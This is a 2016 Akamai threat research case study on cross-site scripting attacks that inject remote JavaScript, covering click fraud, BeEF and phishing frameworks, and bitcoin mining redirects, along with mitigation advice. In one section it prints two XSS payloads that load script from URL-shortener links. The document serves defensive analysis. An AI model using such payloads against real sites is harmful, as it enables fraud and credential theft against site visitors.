AKAMAI CASE STUDY

An Analysis of xss Exploitation

through Remote Resource Injection
Case Study: An Analysis of XSS Exploitation through Remote Resource Injection

1.0 / Overview / To gain clarity on the nature of xss attacks, Akamai’s Threat Research
team analyzed a week of cross-site scripting (xss) alert triggers from our Cloud Security
Intelligence (csi) platform. The goal was to identify vulnerable vectors and specific
techniques employed during remote resource injection exploitation attempts versus simple
probing requests. Specifically, we analyzed xss attacks that attempted to embed remote
JavaScript resources into pages. These attacks are in contrast to benign, proof-of-concept
attempts that call alert(), prompt(), or confirm() to prove that an xss payload was
executed by the browser’s JavaScript engine, and do not attempt to exploit the end user.

2.0 / Scope of Analysis / Earlier this year, we analyzed seven days of JavaScript injection
attempts. We cast a wide net to identify requests that included references to remote JavaScript
resources, and then we dug deeper to identify the intent of the JavaScript code.

3.0 / Findings / Our analysis found that the vast majority (98%) of remote JavaScript code
references were related to legitimate JavaScript frameworks, such as those used by:

• Ad serving technologies
• User experience or user interface frameworks
• User or site analytics
• xss probing (scanners, scanning services vendors, etc.) through remote JavaScript
resource inclusion

Illegitimate JavaScript injections comprised 2% of the injections. Below is a full list of

countries in which malicious servers were hosting code, in order of prevalence from greatest
to least:

• China
• Hungary
• Ukraine
• Russia
• Montenegro
• Mexico
• US
• Brazil
• India

The three primary malicious purposes, in order of prevalence, were illegitimate ad injection,
xss exploitation frameworks, and bitcoin mining.

2
Case Study: An Analysis of XSS Exploitation through Remote Resource Injection

3.1 / Illegitimate Ad Injection / Click fraud and other deceptive advertising schemes
use illegitimate ad injection, as shown in Figure 1.

Figure 1: This click-fraud JavaScript loads invisible advertisements

3.2 / xss Exploitation Frameworks / Browser Exploit Framework (BeEF), as shown

in Figure 2, and xss Platform, which allows phishing for user credentials (Figure 3), are
used to control web browsers.

Figure 2: A BeEF injection attempt

3
Case Study: An Analysis of XSS Exploitation through Remote Resource Injection

Figure 3: An XSS platform phishing pop-up screen seeks to steal user credentials

3.3 / Bitcoin Mining / The unsuspecting user is redirected to a bitcoin mining domain,
and then the client is remotely monitored, as shown in Figure 4.

Figure 4: A URL shortener redirects to a bitcoin mining domain

The domain shown in Figure 5 (www.spartacusminer.com) hosts a bitcoin mining service.

Figure 5: Spartacus is a bitcoin mining service

4
Case Study: An Analysis of XSS Exploitation through Remote Resource Injection

The injections often utilized url-shortener services such as https://tr.im/ or http://t.cn/ to

obfuscate the location of the malicious JavaScript files. Additionally, the use of legitimate
url shortener services makes it more difficult for client reputation vendors to blacklist an
entire domain. Figure 6 shows two example payloads:

param=” src=”https://tr.im/YrYDX”></script>
param=<script src=http://t.cn/RG9I7lu></script>

Figure 6: XSS attacks that utilized URL shortener services

It was common to see multi-phase loading (a script that continuously calls another script)
of the malicious resource. On average, there were two embeds (script A loads script B). This
result is partly a byproduct of the use of url shortener services, because they use http 302
redirection to send the user to the next step in the request chain. Figure 7 shows an example
of html document.write methods used to redirect users to a click-fraud page that
displays hidden Windows Media resources.

Figure 7: Use of HTML document.write methods redirects the victim to a click-fraud site

5
Case Study: An Analysis of xss Exploitation through Remote Resource Injection

In all of the cases, the malicious code was packed and obfuscated, using multiple layers of
tricks to avoid being readable. Figure 8 shows an example that uses JavaScript hex escaping
to obscure data. The resulting JavaScript code forces the web browser to make an image
request call to a web service every few microseconds.

Figure 8: Obfuscated JavaScript file

4.0 / Conclusion and xss Mitigation / There is a whole world of xss taking place
that goes beyond proof-of-concept pop-up boxes. Malicious actors are leveraging xss
vulnerabilities for nefarious purposes including click/ad fraud, session stealing, and
compromising users’ browsers. Organizations can help mitigate the abuse of xss
vulnerabilities within their web applications by conducting vulnerability scans and
deploying a web application firewall to help protect web sites. End users can benefit from
the latest version of their web browser, because many have built-in xss protections, and
consider installing a security plugin such as NoScript.

About Akamai® As the global leader in Content Delivery Network (cdn) services, Akamai makes the Internet fast, reliable and secure for its customers. The company’s advanced web
performance, mobile performance, cloud security and media delivery solutions are revolutionizing how businesses optimize consumer, enterprise and entertainment experiences for
any device, anywhere. To learn how Akamai solutions and its team of Internet experts are helping businesses move faster forward, please visit www.akamai.com or blogs.akamai.com,
and follow @Akamai on Twitter.

Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 57 offices around the world. Our services and renowned customer care are
designed to enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are
listed on www.akamai.com/locations.

©2016 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the
Akamai wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication
is accurate as of its publication date; such information is subject to change without notice. Published 08/16.